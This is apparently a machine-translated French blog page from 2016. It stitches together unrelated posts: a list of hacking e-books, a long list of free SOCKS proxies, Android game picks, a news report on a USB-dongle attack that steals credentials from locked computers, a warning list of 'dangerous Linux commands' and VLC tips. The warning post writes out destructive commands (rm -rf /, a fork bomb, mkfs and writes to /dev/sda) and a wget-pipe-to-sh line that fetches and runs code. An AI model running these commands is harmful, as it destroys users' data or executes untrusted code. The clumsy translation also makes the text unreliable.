Powered By Blogger

Rechercher sur ce blogue

vendredi 9 septembre 2016

Le Meilleur Hacking EBooks 101: Télécharger en PDF 2016 maintenant !



En savoir plus sur le Computer Ethical Hacking n'est pas si facile que de parler sur le web. Les Hackers ,leurs connaissances c'est plus qu'un gars simple parce qu'il est pas un gars simple.Si vous voulez être un hacker, vous devez apprendre beaucoup de choses sur le piratage. Il y a plusieurs façons que vous pouvez en apprendre davantage sur Hacking. L'un est de regarder en ligne le piratage des didacticiels vidéo et second est déconnecté lecture des livres de piratage éthique.Ici, nous vous offrons gratuitement le piratage des ebooks pour apprendre des astuces de piratage Offline.These tous les livres de piratage sont gratuits pour les téléchargements.Dans cette liste de livre, vous en apprendre davantage sur la façon de pirater, la fissuration du mot de passe, wifi hack and site web de piratage, etc.Ces tous les livres sont le meilleur guide pour les débutants qui veulent apprendre le piratage.Tous ces livres éthique de piratage pdf sont gratuits pour le téléchargement. Avec ces livres, vous apprenez bases de piratage et en apprendre davantage sur les outils de piratage.Avec l'aide de ces livres de piratage éthique, vous pouvez apprendre libre cours de piratage éthique sans dépenser d'argent.Gardez le calme et HackerGardez le calme et Hacker

Top Meilleur gratuit Ethical Hacking E-Books 2016 PDF:

    
Black Belt Hacking & Complete Hacking Book
    
Hackers Lycée 13 Complete Hacking E-books
    
Test de pénétration Avec Backtrack 5
    
Un guide pour débutants Hacking Computer Systems
    
Livre noir des virus et Hacking
    
Secrets de Super et professionnels Hackers
    
Dangerous Base de données et les attaques Google Hacking
    
Internet avancée par déni de service (DDOS) Attaque
    
Computer Hacking et logiciels malveillants attaques pour les nuls
    
G-mail Advance Hacking Guides et Tutoriels
    
Une vulnérabilité Exploit & site Hacking for Dummies
    
Web App Hacking (Handbook Hackers)
    
Sécurité Réseaux crypting et Hacking
    
Botnets Le tueur d'applications Web Hacking
    
Hacking attaques et exemples d'essai
    
Hacking Réseau et Ombres Hacking Attaques
    
Gris Hat Hacking et Complete Guide to Hacking
    
Advance Hacking Exposed Tutoriels
    
501 Site Web Secrets Hacking
    
Internet Security Technology et Hacking
    
Guide d'étude CEH Certified Ethical Hacker
    
SQL Injection avancée Hacking et Guide
    
test Hacking & Pénétration Web
    
OWASP Hacking Tutoriels et Web App Protection
    
CEH - Hacking Secrets de bases de données et Exploit
    
Ethical Hacking Valeur et tests de pénétration
    
Hack un site Web quelconque, Complete Web App Hacking
    
Débutants Hackers et tutoriels
    
Ethical Hacking Complete E-book pour les débutants
    
Backtrack: tutoriels Advance Hacking
    
attaques par injection SQL et des didacticiels par Exploit-DB
    
XSS + Vulnérabilité Exploitation & Site Web Hacking
    
Ultime Guide des attaques d'ingénierie sociale
    
White Hat Hacking guide complet pour les attaques XSS
    
Cross Site Scripting et sites de piratage
    
Le Manuel de métro Hackers (pirater le système)
    
tutoriels SQL Injection aveugles et Hacking
    
Secrets Revealed Hacking
    
Hacking Base de Données et de posséder des systèmes
    
Reverse engineering pour les débutants
    
Reverse engineering (The Real Hacking)
    
Computer Hacking
    
Hack votre ami en utilisant Backtrack
    
Reverse engineering Hacking et Cracking
    
Hack du système pour les débutants
    
Piratage de systèmes informatiques
    
Aveugle Injection SQL Découverte et exploitation


Source.:

Dernière mise à jour des Proxies et Socks gratuits


Dernière mise à jour des Proxies et Socks gratuits .

Derniers Proxies gratuits et Socks pour débloquer les sites Web bloqués dans votre ordinateur.


101.255.17.137:1080
101.255.17.242:1080
101.255.17.245:1080
101.255.17.246:1080
101.255.60.202:1080
103.10.63.223:1080
103.16.112.137:1080
103.16.115.18:1080
103.54.148.6:1080
103.54.150.65:1080
103.58.75.1:1080
104.49.14.93:1080
109.202.118.121:1080
109.74.75.229:1080
110.138.26.188:1080
110.172.187.65:1080
110.232.93.138:1080
111.151.9.76:1080
111.192.130.156:1080
113.105.237.86:1080
113.21.231.110:1080
116.49.142.76:1080
117.176.153.253:1080
117.239.199.187:1080
119.2.48.90:1080
119.47.91.113:1080
120.197.83.154:10800
120.198.150.2:1080
122.129.74.147:1080
122.157.54.242:1080
124.205.207.178:1080
124.205.54.52:1080
126.41.254.149:1080
14.156.122.149:1080
14.29.78.106:1080
149.255.24.83:1080
149.3.143.250:1080
150.242.104.2:1080
159.255.165.234:1080
175.140.137.133:1080
176.215.11.3:1080
177.11.136.138:1080
177.47.169.62:1080
179.127.175.210:1080
182.253.33.248:1080
183.88.34.203:1080
185.66.130.36:1080
186.70.174.155:1080
187.210.37.36:1080
188.92.76.68:1080
190.145.83.107:1080
191.37.28.3:1080
195.144.232.165:1080
202.77.108.61:1080
202.77.96.120:1080
202.77.96.121:1080
202.77.96.124:1080
203.130.215.146:1080
210.39.18.236:1080
217.11.67.178:1080
217.219.101.130:1080
218.109.86.32:1080
218.24.45.194:1080
218.248.73.193:1080
218.89.38.21:1080
221.178.230.30:1080
222.45.113.17:1080
31.173.68.162:1080
41.60.130.35:1080
42.96.130.116:1080
46.216.57.166:1080
46.28.245.90:1080
46.99.133.241:1080
5.83.21.109:1080
52.74.62.15:1080
58.20.0.246:1080
58.20.0.247:1080
59.36.43.85:1080
59.37.163.176:1080
59.39.88.190:1080
60.31.191.213:1080
62.176.103.250:1080
66.109.21.61:1080
79.101.32.3:1080
79.101.32.6:1080
79.127.102.66:1080
80.84.176.213:1080
81.162.104.97:1080
82.208.209.3:1080
82.208.95.64:1080
82.99.220.219:1080
83.239.108.238:1080
85.185.112.8:1080
85.185.244.119:1080
85.185.244.125:1080
88.82.168.156:1080
88.87.82.184:1080
91.144.135.180:1080
92.247.125.186:1080
94.97.89.117:1080
95.154.68.128:1080
103.14.96.97:12345
104.128.202.195:28744
104.219.251.168:9050
104.220.26.167:41072
104.220.32.232:18484
104.220.36.145:40518
106.187.88.101:44037
109.251.235.20:16161
112.206.233.110:10080
115.29.139.240:54321
117.79.155.237:10080
119.14.62.194:41312
123.30.188.46:2214
144.76.71.221:12602
149.129.7.109:16615
151.226.184.53:64988
158.222.205.234:60154
162.144.109.46:44037
162.223.48.196:16400
162.245.21.83:26029
173.217.152.199:13598
175.136.255.22:3389
175.156.112.211:57167
175.156.239.227:63921
175.211.135.226:64058
176.102.215.58:64361
176.104.1.182:25557
176.105.202.82:31291
176.109.83.138:58343
176.116.104.37:17508
176.124.122.40:16239
176.31.181.3:47007
176.36.175.20:52539
176.41.144.59:18210
177.55.34.23:13861
178.132.217.174:27434
178.140.26.151:31248
178.140.63.225:24422
178.151.123.218:16845
178.151.158.167:65000
178.158.254.132:19482
178.159.63.60:24488
178.162.105.180:56086
178.17.178.228:10245
178.17.186.20:55822
178.174.241.148:37169
178.215.170.61:51937
178.252.148.21:31221
178.63.179.162:14555
183.86.209.63:8080
184.155.143.249:53043
186.74.93.92:59158
188.120.239.181:9050
188.120.239.181:9053
188.92.75.9:5009
188.92.76.68:5068
190.242.98.155:56425
192.163.207.72:44037
192.163.207.72:57982
192.169.250.5:44037
192.252.222.37:14096
194.141.79.11:8020
199.36.221.6:52544
199.58.185.222:17072
202.175.76.203:34404
203.151.98.74:14555
203.88.170.183:8081
207.188.135.35:41096
207.190.116.231:43153
209.54.60.29:10080
212.5.34.66:6412
212.67.216.84:14555
217.172.132.204:43006
217.172.132.204:57881
217.172.132.207:43006
218.107.220.124:12345
218.61.60.135:10080
222.73.29.34:80
24.234.204.54:30660
24.90.205.240:34741
31.43.103.64:49573
37.157.192.98:23467
37.187.35.186:14555
37.247.108.14:1233
41.63.164.6:36153
41.76.81.150:49428
46.38.0.79:11881
59.19.6.79:1337
61.144.125.12:98
61.218.226.232:443
64.185.129.71:16122
64.33.160.243:2235
64.34.72.217:33233
64.34.72.220:1233
64.34.72.220:33233
67.191.26.153:8080
67.201.33.70:9100
67.202.112.137:8020
68.178.130.191:8080
69.246.216.236:53317
72.10.15.121:3366
73.15.0.96:43075
74.76.111.77:1337
76.14.167.28:14617
78.225.12.125:50213
81.136.247.116:8888
84.199.86.195:14555
84.23.94.104:14555
84.23.94.125:14555
84.23.94.144:14555
84.23.94.184:14555
84.23.94.207:14555
84.23.94.239:14555
84.23.94.240:14555
84.23.94.55:14555
84.23.94.69:14555
84.23.94.89:14555
85.159.213.129:9050
87.98.233.121:47007
91.189.20.82:5103
91.224.182.76:16295
91.235.246.24:44542
92.222.21.38:14555
94.137.50.114:42783
94.23.199.42:47007
94.231.187.161:1081
94.231.187.65:1081
94.28.107.246:41820
94.82.100.109:80
98.101.157.150:8020
104.128.202.195:28744
104.219.251.168:9050
104.220.32.232:18484
104.220.36.145:40518
104.49.14.93:1080
12.190.41.156:1080
12.190.41.157:1080
162.245.21.83:26029
173.217.152.199:13598
184.155.143.249:53043
192.169.250.5:44037
192.252.222.37:14096
199.36.221.6:52544
199.58.185.222:17072
204.12.255.72:1080
207.188.135.35:41096
209.54.60.29:10080
24.196.69.180:1080
24.234.204.54:30660

Source.: ici !

Top 10 des meilleurs jeux HD Android, en 2016



Ici, nous faisons une liste des meilleurs Top 10 meilleurs HD Jeux Android, vous devez jouer en 2016. 
Tous ces jeux sont disponibles sur Google Play Store.
Top 10 Meilleurs HD Jeux Android 2016 | haute Graphics
1) Creed Pirates Assassin
Au numéro 1 sur notre liste de la liste des 10 meilleurs jeux HD Android, nous avons le bien connu, Creed Pirates Assassin. Comme vous vous attendez d'un jeu développé par Ubisoft, les valeurs de production sont élevés - il y a une certaine modélisation 3D d'experts ici, veiller à ce que les bateaux semblent réalistes même si les batailles navales sont tout sauf.
Les cut-scenes, tout simplement, avec des personnages de dessins animés statiques, portent aussi le charme et il y a des toiles de fond amoureusement conçu pour faire la bataille. Même quelques années plus tard, cela est encore l'un des plus beaux titres sur Android.TéléchargerQR CodeCreed Pirates AssassinDéveloppeur: Ubisoft EntertainmentPrix: gratuit +

   
LIRE 6 Meilleur Android gratuit Jeux multijoueurs Vous pouvez jouer avec vos amis2) Unkilled
Ceci est un autre grand jeu mobile. Si vous êtes un fan du jeu apocalypse zombie alors ce titre se réunira vous avez envie aussi. Le jeu en tant que grands graphiques si vous rappelez-vous qu'il est destiné à être joué sur un appareil mobile portable. Le gameplay est grande et le jeu vous tiendra accroché pendant une longue période. Ceci est une excellente façon de passer le temps et qui est la raison pour laquelle ce jeu est sur notre liste des 10 meilleurs jeux HD Android que vous devez télécharger.TéléchargerQR CodeUNKILLEDDéveloppeur: MADFINGER JeuxPrix: gratuit +

   
3) Morte Effect 2
Si vous êtes un fan de la série Dead Space, ainsi que DOOM alors vous devriez donner à ce jeu un essai. Ce jeu comporte des zombies que vous serez en train de tuer et de faire votre chemin à travers les différentes étapes qui obtiennent de plus en plus difficile que vous progressez dans le jeu.TéléchargerQR CodeEffet Dead 2Développeur: BadFly Interactive, a.s.Prix: gratuit +

   
4) Epic Citadel
Donc, ce n'est pas vraiment un jeu, mais si vous voulez voir ce que votre téléphone ou tablette est vraiment capable, alors il ne peut pas faire mieux que cela. Propulsé en utilisant l'Unreal Engine 3, Epic Citadel vous permet d'explorer la citadelle de Infinity Blade.
Il y a une cathédrale, des passages sinueux, un bazar en plein air. Il est extrêmement impressionnant comme une vitrine de ce que Android est capable et très amusant de simplement se promener pendant un certain temps.TéléchargerQR CodeEpic CitadelDéveloppeur: Epic Games, Inc.Prix: Gratuit

   
LIRE Top 35 Avantages Pour Enracinement Android Phone en 20165) Rayman Adventures
série Rayman est également un populaire et maintenant vous pouvez jouer le jeu sur votre appareil mobile ainsi. Ce genre de titres viennent à des plates-formes mobiles parce que vous avez toujours accès à votre téléphone. Ce jeu est génial si vous voulez tuer un certain temps.TéléchargerQR CodeRayman AdventuresDéveloppeur: Ubisoft EntertainmentPrix: gratuit +

 
6) Real Racing 3
# 1 Top App gratuite dans plus de 100 pays ** Real Racing 3 est la franchise primée qui établit une nouvelle norme pour les jeux de course mobiles - vous devez jouer pour le croire.
Real Racing 3 dispose d'une liste sans cesse croissante de pistes sous licence officielle avec 39 circuits en 17 endroits du monde réel, une grille de 43 voitures et plus de 140 voitures méticuleusement détaillées des meilleurs fabricants. De plus en temps réel multijoueur, Leaderboards sociaux, Time Trials, courses de nuit, et le temps innovant Shifted Multijoueur ™ (TSM) la technologie, ce qui vous permet de faire la course tout le monde, à tout moment, partout.TéléchargerQR CodeReal Racing 3Développeur: Electronic ArtsPrix: gratuit +

   
7) Trigger Morte 2
Ceci est un jeu de zombie populaire que vous pouvez jouer sur votre téléphone. jeux Zombie sont de plus en plus populaires ces jours comme vous pouvez le voir sur cette liste déjà.TéléchargerQR CodeTRIGGER DEAD 2Développeur: MADFINGER JeuxPrix: gratuit +

   
8) Le sang sauvage
Si vous êtes un vieux genre de personne de l'école alors ce jeu est pour vous. Adore les vieilles légendes comme le chevalier de la table ronde, alors vous devriez prendre ce jeu de fantaisie pour un spin. Comme d'autres jeux, ce jeu a de beaux graphiques. Ceci est l'un des meilleurs jeux HD Android dont vous avez besoin d'essayer. Le jeu nécessite ~ 2Go d'espace libre pour installer.TéléchargerQR Codesang sauvageDéveloppeur: GameloftPrix: $ 6.99 +

   
9) Walking Robots War
Oui, le nom est pas branché mais si vous aimez guerriers mech alors ce jeu est l'un pour vous d'essayer. Je me souviens que je jouais un jeu similaire à celui-ci le chemin du retour sur PC. Va à montrer comment avancé jeux mobiles sont devenus. Ceci est l'un des meilleurs jeux HD Android.
War Robots est un jeu multijoueur bourré d'action avec 6 vs 6 batailles de l'équipe en temps réel!TéléchargerQR CodeRobots de guerreDéveloppeur: Pixonic LLCPrix: gratuit +

   
10) Modern Combat 5: Blackout
Ceci est un autre jeu que vous devez prendre. Les commandes sont personnalisables ainsi vous pouvez les changer en fonction de ce qui se sent le mieux pour vous. Ce ne sera pas rivaliser avec PC ou console, mais vous serez surpris à quel point il est.TéléchargerQR CodeModern Combat 5: BlackoutDéveloppeur: GameloftPrix: gratuit +

   
Top 10 Meilleurs HD Jeux Android 2016 | haute Graphics
Click To Tweet
Voici notre liste des 10 meilleurs jeux Android HD, vous devriez avoir sur votre appareil. Si nous avons manqué quelques HD Jeux Android populaires nous le faire savoir.



Source.:

Comment Hacker Windows et OS X protégé par mots de passe, en 13 secondes




Un chercheur de sécurité nommé Rob Fuller a découvert une méthode d'attaque unique qui peut être utilisé pour voler des informations d'identification à partir d'un ordinateur verrouillé. Ce piraté œuvres dans Windows et Mac PC.
Un chercheur en sécurité a trouvé un moyen unique qui peut être utilisé pour déverrouiller ou de voler des informations d'identification à partir d'un ordinateur verrouillé (mais, connecté) et un autre dieu nouvelles en elle a travaillé sur Windows et Apple Mac OS X système de Microsoft.Un expert en sécurité Rob Fuller dans son blog démontré et expliqué comment exploiter un dispositif à base de SoC-USB pour la transformer en un titre-renifleur qui peut être utilisé même sur un ordinateur verrouillé ou un ordinateur portable.
Le code du firmware du dongle USB est modifiée par plus complète de telle sorte que quand il est branché à un adaptateur Ethernet, le dispositif plug-and-play USB installe et se sert de passerelle de réseau, serveur DNS, ou Web Proxy Auto-découverte Protocole (WPAD) serveur pour la machine de la victime.(Lire également: Désactiver Windows 10 Keylogger)
L'attaque est possible parce que dans presque tous les systèmes d'exploitation d'ordinateur installer automatiquement les périphériques USB Plug-and-Play même ordinateur est verrouillé.[Par exemple: lorsque vous vous connectez la souris USB avec votre ordinateur portable ou ordinateur, il se connecte automatiquement avant connexion],
"Même si un système est verrouillé, le dispositif [dongle] obtient encore installé," Fuller explique dans son blog.
"Maintenant, je crois qu'il ya des restrictions sur les types de périphériques sont autorisés à installer dans un état verrouillé sur les systèmes d'exploitation plus récents (Win10 / El Capitan), mais Ethernet / LAN est certainement sur la liste blanche."


Comment l'attaque fonctionne?
Vous devez vous demander pourquoi votre ordinateur partage automatiquement les informations d'identification de Windows avec un périphérique connecté?
Ceci est parce que Microsoft se comporte par défaut des services de résolution de nom de sa fenêtre, qui peut être abusé de voler l'authentification de vos informations d'identification.Responder est le logiciel qui modifie l'adaptateur USB Ethernet plug-and-play, à travers lequel le réseau peut être spoofé pour intercepter les informations d'identification hachées puis il est stocké dans une base de données SQLite.Maintenant, les informations d'identification hackées qui sont stockées dans la base de données SQLite nous collectées par l'outil d'exploitation du réseau et peuvent ensuite être facilement par brute forcée pour obtenir des mots de passe en texte clair.
Apparemment, tous les besoins de l'attaquant est l'accès physique à un ordinateur cible pour mener cette attaque, par l'acquisition de l'accès physique, il peut brancher l'adaptateur USB Ethernet nuisibles.Cependant, il dit que le temps moyen nécessaire pour une attaque réussie est de seulement 13 secondes.


 Source.:

Les 10 plus dangereuses commandes de Linux OS



 Vous ne devriez jamais exécuter sur votre machine:
Terminal Linux est l'un des programmes les plus puissants sous Linux OS. La ligne de commande sous Linux OS est très productif, utile et intéressant, cependant, il peut parfois être très dangereux, surtout lorsqu'ils traitent racine de l'utilisateur ou de l'utilisateur qui peut prendre la plupart de leurs privilèges, sudo.
Vous devez savoir exactement ce que vous faites. Cet article a été créé pour les utilisateurs de Linux simplement signaler quelques-unes des commandes du terminal, que chaque utilisateur Linux devrait réfléchir à deux fois avant de les exécuter.
Si vous ne savez pas sur Linux et que vous voulez apprendre Linux en ligne lire ce post.LIRE Suivre 10 chaînes YouTube pour apprendre Linux en ligne
Lire la suite attentivement et connaître ces commandes dangereuses linux. Assurez-vous de ne jamais exécuter ces commandes dangereuses Linux dans votre machine Linux.
1. rm -rf
La commande rm -rf / supprime tout ce qu'il peut possible, y compris les fichiers sur votre disque dur et les fichiers sur des périphériques de supports amovibles connectés. Cette commande est plus compréhensible si elle est décomposée:
2 .: () {: |: &};:
: () {: |: &} ;: Également connu sous le nom Fork Bomb est une attaque par déni de service contre un système Linux. : () {: |: &} ;: Est une fonction bash. Une fois exécuté, il se répète plusieurs fois jusqu'à ce que le système se bloque.
Vous ne pouvez vous en débarrasser en redémarrant votre système. Soyez donc prudent lors de l'exécution de cette commande sur votre shell Linux.Commandes Fork
Commandes Fork
Source: Dake sur Wikimedia CommonsLIRE Comment faire pour convertir un chargeur USB dans un ordinateur Linux
3. command> / dev / sda
La commande ci-dessus écrit la sortie de 'commande sur le bloc / dev / sda. La commande ci-dessus écrit les données brutes et tous les fichiers sur le bloc sera remplacé par les données brutes, entraînant la perte totale des données dans le bloc.
4. répertoire mv / dev / null
/ Dev / null est un autre endroit spécial - déplacer quelque chose à / dev / null est la même chose que de le détruire. Pensez à / dev / null comme un trou noir. Essentiellement, mv ~ / dev / null envoie tous vos fichiers personnels dans un trou noir.LIRE Top 10 Meilleur Kali Linux Tutoriels de sécurité pour les débutants
5. http wget: // malicious_source -O | sh
La ligne ci-dessus télécharge un script à partir du Web et l'envoie à sh, qui exécute le contenu du script. Cela peut être dangereux si vous n'êtes pas sûr de ce que le script est ou si vous ne faites pas confiance sa source - ne pas exécuter des scripts non fiables.
6. mkfs.ext3 / dev / sda
La commande ci-dessus va formater le bloc 'sda' et vous serait sûrement savoir que, après l'exécution de la commande ci-dessus votre Block (Hard Disk Drive) serait nouvelle, BRAND NEW! Sans les données, en laissant votre système dans l'étape irrécupérables.LIRE Comment faire pour exécuter Windows 98 ou Linux entièrement dans votre navigateur Chrome
7.> File
La commande ci-dessus est utilisée pour libérer le contenu du fichier. Si la commande ci-dessus est exécutée avec une erreur de frappe ou de l'ignorance comme "> xt.conf" va écrire le fichier de configuration ou tout autre système ou d'un fichier de configuration.
8. ^ foo ^ bar
Cette commande est utilisée pour modifier la commande d'exécution précédente, sans la nécessité de retaper à nouveau l'ensemble de la commande. Mais cela peut vraiment être gênant si vous ne l'avez pas pris le risque de bien vérifier le changement de commande d'origine en utilisant ^ foo ^ commande bar.LIRE Suivre 10 chaînes YouTube pour apprendre Linux en ligne


10. Décompression Bombe
Vous avez reçu un fichier compressé et vous êtes invité à extraire ce fichier qui semble être de très petite taille, mais peut-être un peu KB. En fait, ce petit fichier compressé de taille contient des données très fortement compressées.
Une fois le fichier décompressé, des centaines de Go de données est extrait qui peut remplir votre disque dur pour faire baisser les performances de votre système. Pour éviter cette situation, rappelez-vous toujours d'accepter des données provenant de sources dignes de confiance.10 Most Dangerous Linux OS Commandes Vous ne devriez jamais exécuter sur votre machine

LIRE Top 10 Meilleur Hacking gratuit Outils 2016 pour Windows et Linux


Source.:

VLC : Top 20 Meilleurs astuces cachées que vous ne connaissez pas



VLC est l'un de nos lecteurs multimédias préférés (et aussi le vôtre). Lecteur multimédia VLC est l'un des meilleurs lecteur multimédia gratuit pour Windows PC. Il est livré avec 100s de fonctionnalités. Dans ce post, nous recueillons des trucs cachés et des conseils pour VLC media player. Vous pouvez faire beaucoup plus de choses avec le lecteur VLC comme jouer la vidéo Youtube, enregistrer des vidéos, prendre des instantanés et beaucoup plus. Lire la suite et savoir ces trucs secrets VLC.1. Convertir des vidéos en utilisant VLC
Beaucoup de VLC lecteurs multimédia utilisateurs ne savent pas à propos de cette astuces. VLC peut changer et convertir les vidéos dans de nombreux formats. Donc, vous n'avez pas besoin de télécharger un logiciel pour convertir Videos.Step 1: Open media player VLC et cliquez sur "Media" qui se trouve à
Étape 1: Ouvrez VLC media player et cliquez sur "Media" qui se trouve au coin supérieur droit. Maintenant Sélectionnez Convertir / Enregistrer. Ou Sinon, vous pouvez simplement appuyer sur "CTRL + R".Étape 2: Maintenant, une fenêtre apparaîtra comme une image ci-dessous, cliquez sur Ajouter et sélectionnez le fichier que vous voulez convertir, et cliquez sur Convertir / enregistrer.Convertir des vidéos en utilisant VLC
Convertir des vidéos en utilisant VLC
Étape 3: Sélectionnez ensuite le type de fichier que vous voulez convertir. Vous pouvez même modifier l'encodage vidéo. Voilà, ce qui est de savoir comment vous pouvez convertir une vidéoConvertir des vidéos en utilisant VLC
Convertir des vidéos en utilisant VLC
Voilà, ce qui est de savoir comment vous pouvez convertir la vidéo avec VLC Media Player.2. Visionnez les vidéos Youtube dans VLC:
Oui, vous avez bien lu, vous pouvez directement regarder toute la vidéo youtube lecteur VLC Media. Avant d'essayer cette astuce dans votre PC, assurez-vous d'avoir une bonne connexion Internet. Vous pouvez également vous débarrasser des perturbations indésirables causés dans les vidéos Youtube si vous regardez les vidéos dans VLC.
Étape 1: Ouvrez VLC media player et cliquez sur "Media" pour sélectionner "Ouvrir un flux réseau". CTRL + N est le raccourci pour effectuer cette tâche.
Étape 2: Ouvrez Youtube et rendez-vous sur votre Vidéo favorite, Copiez l'URL de la vidéo youtube.
Étape 3: Une fois que vous avez copié l'URL simplement coller là où il est dit Saisissez l'URL du réseau et cliquez sur Lecture.
Vous verrez que la vidéo est en streaming dans VLC Smoothly.3. Sync Audio dans VLC
Si Audio de votre vidéo ne se synchronise pas avec le flux vidéo puis avec une petite astuce que vous pouvez résoudre ce problème dans VLC media player. Vous pouvez même appliquer des effets à vos fichiers audio et vidéo, voyons comment:
Étape 1: Ouvrez VLC media player, cliquez sur Outils> Effets et filtres.
Étape 2: Cliquez sur Effet Audio si vous souhaitez ajouter des effets si vous jouez audio ou Cliquez sur l'effet de la vidéo pour ajouter des effets dans un fichier vidéo.
Étape 3: Maintenant Jouez et apporter des modifications pour ajouter des effets qui auront lieu en direct.Effets audio dans vlc
Effets audio dans vlc
Vous pouvez faire des changements dans la forme de luminosité, la teinte, etc. D'autres onglets comme la synchronisation est là pour ajouter des effets aussi.4. Prendre un instantané dans VLC
Plusieurs fois, en regardant un film ou une vidéo aléatoire que nous souhaitons prendre un instantané de celui-ci, mais il est trop de temps pour appuyer sur le bouton Imprimer de l'écran, puis la peinture ouverte et tout ça Ennuyeux.
Heureusement, VLC est livré avec la fonction de snapshot construire dans. Tout ce que vous devez faire est un clic droit sur la vidéo en cours de lecture, passez votre souris sur l'option de la vidéo (dans le menu contextuel) et sélectionnez Prendre un instantané.Prendre un instantané dans VLC
Prendre un instantané dans VLC
Il est aussi facile que cela, mais est très pratique à la fois.5. Utilisez la vidéo comme papier peint de bureau utilisant VLC
VLC est le lecteur multimédia Seul qui peut le faire pour vous. Vous pouvez remplacer votre fond d'écran avec une vidéo en utilisant rien d'autre que VLC media player.
Pour ce faire, sélectionnez une vidéo et commencer à jouer avec VLC. Faites un clic droit sur l'écran, sélectionnez Vidéo, puis sélectionnez Définir comme fond d'écran.vidéo comme fond d'écran dans vlc
vidéo comme fond d'écran dans vlc6. Enregistrement direct de Webcam
Vous pouvez enregistrer votre session de conversation vidéo facilement en utilisant VLC.1. Accédez aux médias - Ouvrir un périphérique de capture.2. Sur l'écran de capture de l'appareil, vous pouvez sélectionner le périphérique vidéo et aussi le périphérique audio comme le microphone du système.
3. Vous pouvez également configurer les options dans les paramètres Configurer. Finetune votre capture avec la luminosité, le contraste, la teinte, la saturation (et autres) des contrôles.4. Descendez et descendre sur le bouton Lecture pour ouvrir la boîte de dialogue Convertir où vous pouvez sélectionner le fichier de destination, cliquez sur le bouton Parcourir pour sélectionner le fichier vidéo emplacement, le nom et le format.Enregistrement Webcam directement dans VLC
Enregistrement Webcam directement dans VLC7. Ecouter Radio en ligne
VLC comprend des centaines de stations de radio Shoutcast. Vous avez juste besoin de lui permettre par le biais des médias >>> Services de découverte >>> Shoutcast annonces radio. Maintenant, ouvrez la liste de lecture et de naviguer à travers les stations.Souscrivez Podcats dans VLC
Souscrivez Podcats dans VLC8. Lecture de fichiers Rar
Lecture des médias contenus dans les fichiers Archive Si vous avez un fichier ZIP ou RAR qui contient un fichier multimédia, vous pouvez réellement les jouer au sein de VLC sans les extraire. Il suffit de les ouvrir avec VLC et il va jouer tous les fichiers contenus dans. Si le fichier est divisé en morceaux, il suffit d'ouvrir la première partie de l'archive dans VLC, ce que tous les fichiers sont dans le même endroit. Ceci est un bon conseil quand vous ne voulez pas perdre de l'espace de décompression de la vidéo.
Savez-vous VLC peut lire des vidéos zippées à l'intérieur des fichiers RAR? Ils jouent comme des fichiers vidéo normaux et vous pouvez même utiliser la barre de recherche. Si le fichier RAR est divisé en plusieurs fichiers, pas de problème. Il suffit de charger la première partie (.part001.rar) et il sera automatiquement prendre le reste des parties et de jouer le fichier entier.9. Tous les Podcasts
VLC peut être utilisé pour diffuser des podcasts, de sorte que vous n'avez pas besoin de logiciel supplémentaire si vous souhaitez écouter des podcasts sur votre PC.Souscrire Podcasts dans VLC
Souscrire Podcasts dans VLC

    
Il suffit de cliquer sur le menu Affichage dans VLC et sélectionnez Playlist.
    
Passez la souris sur Podcasts dans la barre latérale, cliquez sur le bouton + et coller l'adresse du flux d'un balado dans la boîte.
    
Vous pouvez ensuite diffuser les épisodes de podcast à partir de VLC.
10. Télécharger et Ajouter un fichier sous-titres
Si une vidéo vous ne vient pas avec des sous-titres, vous pouvez ajouter votre propre en trouvant un fichier de sous-titres SRT pour la vidéo et l'ajouter. Pour ajouter le sous-titre, jouer votre vidéo et aller à Subtitle sur la barre de menu et cliquez sur Ajouter fichier des sous-titres. Si vous voulez VLC pour jouer automatiquement, placez le fichier SRT dans le même dossier que la vidéo et assurez-vous qu'il utilise le même nom de fichier que le fichier vidéo.Ajouter des sous-titres dans VLC media player
Ajouter des sous-titres dans VLC media playerLIRE Comment ajouter Sous-titres Fichier Movies dans VLC Media PlayerLIRE Télécharger Subtitle bon pour vos films de deux façons11. Ruisseau Torrent directement à VLC Media Player
Regarder des films torrent sans téléchargement, oui il est vrai. Tout ce que vous devez télécharger un Ace Player (HD) VLC sur votre ordinateur.
Pour plus regarder cette vidéo et de savoir comment vous pouvez écouter des films torrent sur votre PC en utilisant VLC media player.Ace Player HD
Ace Player HD12. Regarder des films en 3D sur PC avec VLC Media PlayerComment regarder des films en 3D sur PC avec VLC Media Player
Comment regarder des films en 3D sur PC avec VLC Media Player

    
La première étape est exécutée film en 3D dans votre lecteur multimédia VLC. (Assurez-vous que le film que vous avez joué doit être SBS (Side-By-Side) de film en 3D).
    
Après cela, cliquez sur Outils, puis sélectionnez l'option Effets et filtres à partir du menu déroulant.
    
Maintenant, cliquez sur l'onglet Effets vidéo et dans cette section, cliquez sur l'onglet Avancé.
    
Dans l'onglet Avancé, mettez une coche sur l'option 3D anaglyphe.
    
Maintenant, vous êtes prêt à pour regarder des films en 3D dans l'ordinateur. Maintenant, il suffit de mettre vos lunettes rouge / cyan 3D et profiter de votre film 3D.
LIRE Comment regarder des films en 3D sur PC avec VLC Media PlayerFiche 13. Actuellement Jouer Video / Audio
Si vous souhaitez enregistrer et capturer un extrait d'une vidéo que vous jouez, VLC dispose d'une option pour le faire. Pour activer cette fonction, dans la barre de menu, cliquez sur Affichage> Contrôles avancés. Boutons supplémentaires apparaîtront sur l'application. Pendant la lecture d'un fichier multimédia, cliquez sur le bouton d'enregistrement pour commencer l'enregistrement. Appuyez à nouveau pour arrêter. Les enregistrements seront enregistrés dans le dossier Vidéos des vidéos tandis que l'audio sera à votre dossier Musique.
Pendant la lecture d'un fichier multimédia, cliquez droit et sélectionnez bouton Enregistrer pour commencer l'enregistrement. Appuyez à nouveau pour arrêter. Les enregistrements seront enregistrés dans le dossier Vidéos des vidéos tandis que l'audio sera à votre dossier Musique.Enregistrement vidéo dans VLC
Enregistrement vidéo dans VLC14. Débloquer Invisible Jigsaw Puzzle Game dans VLC
Essayez cette astuce dans Vlc Media Player et jouer le jeu caché dans votre PC.Débloquez Invisible Jigsaw Puzzle Game dans VLC
Débloquez Invisible Jigsaw Puzzle Game dans VLC
Étape 1: Ouvrez votre lecteur VLC app. Ne vous embêtez pas si vous jouez la vidéo ou non. Dans le menu principal, cliquez sur le bouton Paramètres étendus au bas de l'écran.
Étape 2: Maintenant, sélectionnez l'onglet "Video Effects" en haut de l'écran et sélectionnez l'onglet "Géométrie" sous cela.
Étape 3: Assurez-vous de cocher sur la case à côté de l'option "Puzzle Game". Ensuite, vous pouvez utiliser les lignes et les champs de colonnes pour sélectionner le nombre de pièces de puzzle, si vous voulez voir dans votre puzzle vidéo interactive. Quand tout est fait, il suffit de cliquer sur le bouton "fermer" au bas de cette fenêtre.
